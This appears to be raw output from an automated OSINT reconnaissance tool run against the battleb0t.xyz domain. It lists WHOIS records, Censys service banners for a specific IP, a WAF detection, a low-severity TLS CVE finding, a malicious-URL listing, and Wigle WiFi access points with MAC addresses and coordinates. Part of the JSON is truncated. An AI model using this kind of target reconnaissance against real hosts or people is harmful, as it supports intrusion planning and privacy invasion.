Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | azis (Net ID: 00:06:B1:15:73:DD) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:42:54 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % Restricted rights.
%
% Terms and Conditions of Use
%
% The above data may only be used within the scope of technical or
% administrative necessities of Internet operation or to remedy legal
% problems.
% The use for other purposes, in particular for advertising, is not permitted.
%
% The DENIC whois service on port 43 doesn't disclose any information concerning
% the domain holder, general request and abuse contact.
% This information can be obtained through use of our web-based whois service
% available at the DENIC website:
% http://www.denic.de/en/domains/whois-service/web-whois.html
%
%
Domain: domixo-hosting.de
Nserver: ns2.inwx.de
Nserver: ns3.inwx.eu
Nserver: ns.inwx.de
Status: connect
Changed: 2020-10-30T16:19:21+01:00
| domixo-hosting.de |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Tinder (Category: dating)
https://tinder.com/@login | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom2888 (Net ID: 00:01:38:85:BD:9E) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c59a6bfbf716314-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | registrar-abuse@cloudflare.com | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:53:02 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | nwapi.battleb0t.xyz |
| 2023-05-12 02:59:34 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | kekw.battleb0t.xyz |
| 2023-05-12 02:53:35 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.110.153:80 | 185.199.110.153 |
| 2023-05-12 03:00:59 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-108-153.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-108-153.github.com |
| 2023-05-12 02:44:14 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| pics.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F1:32:0A) | 41.8781, -87.6298 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Ayse (Net ID: 00:14:C1:3A:06:51) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jia (Net ID: 00:0C:41:75:83:AD) | 39.0469, -77.4903 |
